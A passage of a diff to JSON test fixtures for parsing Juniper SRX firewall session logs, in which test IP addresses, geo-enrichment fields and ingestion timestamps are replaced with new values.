"67.43.156.15", "packets": 1 }, "rule": { @@ -1275,7 +1208,7 @@ "related": { "ip": [ "192.168.255.2", - "89.160.20.112", + "67.43.156.15", "192.168.0.47" ] }, 
@@ -1291,8 +1224,8 @@ "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066072111Z", - "original": "\u003c14\u003e1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"89.160.20.112\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:13:51.707054600Z", + "original": "\u003c14\u003e1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" 
roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"]", "kind": "event", "start": "2018-06-30T02:17:22.753Z", "action": "flow_close", 
@@ -1403,8 +1336,8 @@ "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066074485Z", - "original": "\u003c14\u003e1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.36 reason=\"application failure or action\" source-address=\"10.164.110.223\" source-port=\"9057\" destination-address=\"10.104.12.161\" destination-port=\"21\" service-name=\"junos-ftp\" nat-source-address=\"10.9.1.150\" nat-source-port=\"58020\" nat-destination-address=\"10.12.70.1\" nat-destination-port=\"21\" src-nat-rule-name=\"SNAT-Policy5\" dst-nat-rule-name=\"NAT-Policy10\" protocol-id=\"6\" policy-name=\"FW-FTP\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"24311\" packets-from-client=\"0\" bytes-from-client=\"0\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"1\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.0\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:13:51.707064800Z", + "original": "\u003c14\u003e1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"10.164.110.223\" source-port=\"9057\" destination-address=\"10.104.12.161\" destination-port=\"21\" service-name=\"junos-ftp\" nat-source-address=\"10.9.1.150\" nat-source-port=\"58020\" nat-destination-address=\"10.12.70.1\" nat-destination-port=\"21\" src-nat-rule-name=\"SNAT-Policy5\" dst-nat-rule-name=\"NAT-Policy10\" protocol-id=\"6\" policy-name=\"FW-FTP\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"24311\" packets-from-client=\"0\" bytes-from-client=\"0\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"1\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.0\" encrypted=\"No \"]", "kind": "event", "start": 
"2015-09-25T14:19:53.846Z", "action": "flow_close", @@ -1426,7 +1359,7 @@ "port": 21 }, "port": 21, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1434,28 +1367,22 @@ "destination": { "nat": { "port": 21, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 21, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "rule": { "name": "General-Outbound" @@ -1463,22 +1390,22 @@ "source": { "nat": { "port": 14406, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 3129, - "ip": "81.2.69.193" + "ip": "192.168.224.30" }, "juniper": { "srx": { @@ -1513,8 +1440,8 @@ }, "related": { "ip": [ - "81.2.69.193", - "89.160.20.112" + "192.168.224.30", + "67.43.156.14" ] }, "client": { 
@@ -1522,12 +1449,12 @@ "port": 14406 }, "port": 3129, - "ip": "81.2.69.193" + "ip": "192.168.224.30" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066087269Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.1.1.1.2.41 source-address=\"81.2.69.193\" source-port=\"3129\" destination-address=\"89.160.20.112\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"81.2.69.193\" nat-source-port=\"14406\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707069700Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "action": "flow_started", "category": [ @@ -1549,7 +1476,7 @@ "port": 21, "bytes": 0, "packets": 0, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "log": { "level": "informational" 
@@ -1557,29 +1484,23 @@ "destination": { "nat": { "port": 21, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 21, "bytes": 0, - "ip": "89.160.20.112", + "ip": "67.43.156.14", "packets": 0 }, "rule": { @@ -1588,24 +1509,24 @@ "source": { "nat": { "port": 14406, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 3129, "bytes": 48, - "packets": 1, - "ip": "81.2.69.193" + "ip": "192.168.224.30", + "packets": 1 }, "juniper": { "srx": { @@ -1642,8 +1563,8 @@ }, "related": { "ip": [ - "81.2.69.193", - "89.160.20.112" + "192.168.224.30", + "67.43.156.14" ] }, "client": { 
@@ -1653,13 +1574,13 @@ "port": 3129, "bytes": 48, "packets": 1, - "ip": "81.2.69.193" + "ip": "192.168.224.30" }, "event": { "duration": 0, "severity": 14, - "ingested": "2021-12-06T12:25:20.066091197Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.41 source-address=\"81.2.69.193\" source-port=\"3129\" destination-address=\"89.160.20.112\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"81.2.69.193\" nat-source-port=\"14406\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707074200Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"1\" bytes-from-client=\"48\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"0\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", "action": "flow_started", 
@@ -1683,7 +1604,7 @@ "port": 21, "bytes": 104, "packets": 2, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -1691,29 +1612,23 @@ "destination": { "nat": { "port": 21, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 21, "bytes": 104, - "ip": "89.160.20.112", + "ip": "67.43.156.14", "packets": 2 }, "rule": { @@ -1722,24 +1637,24 @@ "source": { "nat": { "port": 14406, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 3129, "bytes": 144, - "packets": 3, - "ip": "81.2.69.193" + "ip": "192.168.224.30", + "packets": 3 }, "juniper": { "srx": { @@ -1778,8 +1693,8 @@ }, "related": { "ip": [ - "81.2.69.193", - "89.160.20.112" + "192.168.224.30", + "67.43.156.14" ] }, "client": { 
@@ -1789,13 +1704,13 @@ "port": 3129, "bytes": 144, "packets": 3, - "ip": "81.2.69.193" + "ip": "192.168.224.30" }, "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066093892Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.41 reason=\"application failure or action\" source-address=\"81.2.69.193\" source-port=\"3129\" destination-address=\"89.160.20.112\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"81.2.69.193\" nat-source-port=\"14406\" nat-destination-address=\"89.160.20.112\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", + "ingested": "2021-12-10T10:13:51.707078Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"application failure or action\" source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"67.43.156.14\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"FTP\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"14406\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" packets-from-client=\"3\" bytes-from-client=\"144\" packets-from-server=\"2\" bytes-from-server=\"104\" elapsed-time=\"1\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"]", "kind": "event", "start": "2013-01-19T15:18:17.040Z", 
"action": "flow_close", @@ -1819,7 +1734,7 @@ "port": 80, "bytes": 686432, "packets": 584, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -1827,24 +1742,24 @@ "destination": { "nat": { "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 686432, - "packets": 584, - "ip": "81.2.69.193" + "ip": "67.43.156.15", + "packets": 584 }, "rule": { "name": "permit-all" @@ -1852,23 +1767,23 @@ "source": { "nat": { "port": 33040, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 33040, "bytes": 19592, - "ip": "81.2.69.193", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -1919,7 +1834,8 @@ "user1" ], "ip": [ - "81.2.69.193" + "67.43.156.14", + "67.43.156.15" ] }, "client": { 
@@ -1929,13 +1845,13 @@ "port": 33040, "bytes": 19592, "packets": 371, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066096116Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address=\"81.2.69.193\" source-port=\"33040\" destination-address=\"81.2.69.193\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"81.2.69.193\" nat-source-port=\"33040\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:13:51.707084500Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" packets-from-client=\"371\" bytes-from-client=\"19592\" packets-from-server=\"584\" bytes-from-server=\"686432\" elapsed-time=\"60\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" 
destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:18.040Z", "action": "flow_started", @@ -1957,7 +1873,7 @@ "port": 80 }, "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -1965,22 +1881,22 @@ "destination": { "nat": { "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "rule": { "name": "permit-all" @@ -1988,25 +1904,25 @@ "source": { "nat": { "port": 33040, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 33040, "user": { "name": "user1" }, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -2054,7 +1970,8 @@ "user1" ], "ip": [ - "81.2.69.193" + "67.43.156.14", + "67.43.156.15" ] }, "client": { 
@@ -2062,12 +1979,12 @@ "port": 33040 }, "port": 33040, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066098330Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.1.1.1.2.129 source-address=\"81.2.69.193\" source-port=\"33040\" destination-address=\"81.2.69.193\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"81.2.69.193\" nat-source-port=\"33040\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:13:51.707095700Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"33040\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"HTTP\" nested-application=\"FACEBOOK-SOCIALRSS\" nat-source-address=\"67.43.156.14\" nat-source-port=\"33040\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"28\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "action": "flow_started", "category": [ 
@@ -2089,7 +2006,7 @@ "port": 80, "bytes": 646, "packets": 3, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -2097,24 +2014,24 @@ "destination": { "nat": { "port": 80, - "ip": "81.2.69.193" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 646, - "packets": 3, - "ip": "81.2.69.193" + "ip": "67.43.156.15", + "packets": 3 }, "rule": { "name": "permit-all" @@ -2122,23 +2039,23 @@ "source": { "nat": { "port": 48873, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 48873, "bytes": 392, - "ip": "81.2.69.193", + "ip": "67.43.156.14", "user": { "name": "user1" }, @@ -2188,7 +2105,8 @@ "user1" ], "ip": [ - "81.2.69.193" + "67.43.156.14", + "67.43.156.15" ] }, "client": { 
@@ -2198,13 +2116,13 @@ "port": 48873, "bytes": 392, "packets": 5, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-12-06T12:25:20.066100414Z", - "original": "\u003c14\u003e1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"TCP CLIENT RST\" source-address=\"81.2.69.193\" source-port=\"48873\" destination-address=\"81.2.69.193\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"81.2.69.193\" nat-source-port=\"48873\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" destination-interface-name=”st0.0” apbr-rule-type=”default”]", + "ingested": "2021-12-10T10:13:51.707105400Z", + "original": "\u003c14\u003e1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP CLIENT RST\" source-address=\"67.43.156.14\" source-port=\"48873\" destination-address=\"67.43.156.15\" destination-port=\"80\" service-name=\"junos-http\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"67.43.156.14\" nat-source-port=\"48873\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" src-nat-rule-name=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit-all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"32\" packets-from-client=\"5\" bytes-from-client=\"392\" packets-from-server=\"3\" bytes-from-server=\"646\" elapsed-time=\"3\" username=\"user1\" roles=\"DEPT1\" encrypted=\"No\" 
destination-interface-name=”st0.0” apbr-rule-type=”default”]", "kind": "event", "start": "2013-01-19T15:18:20.040Z", "action": "flow_close", @@ -2226,7 +2144,7 @@ "port": 768 }, "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -2234,22 +2152,22 @@ "destination": { "nat": { "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 768, - "ip": "81.2.69.193" + "ip": "67.43.156.14" }, "rule": { "name": "alg-policy" @@ -2257,28 +2175,22 @@ "source": { "nat": { "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "Europe", - "region_iso_code": "SE-E", - "city_name": "Linköping", - "country_iso_code": "SE", - "country_name": "Sweden", - "region_name": "Östergötland County", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": 15.6167, - "lat": 58.4167 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 29518, - "organization": { - "name": "Bredband2 AB" - } + "number": 35908 }, "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -2315,8 +2227,7 @@ }, "related": { "ip": [ - "89.160.20.112", - "81.2.69.193" + "67.43.156.14" ] }, "client": { 
@@ -2324,12 +2235,12 @@ "port": 24065 }, "port": 24065, - "ip": "89.160.20.112" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-12-06T12:25:20.066102468Z", - "original": "\u003c14\u003e1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.1.1.1.2.35 source-address=\"89.160.20.112\" source-port=\"24065\" destination-address=\"81.2.69.193\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"89.160.20.112\" nat-source-port=\"24065\" nat-destination-address=\"81.2.69.193\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:13:51.707114900Z", + "original": "\u003c14\u003e1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", "category": [ 
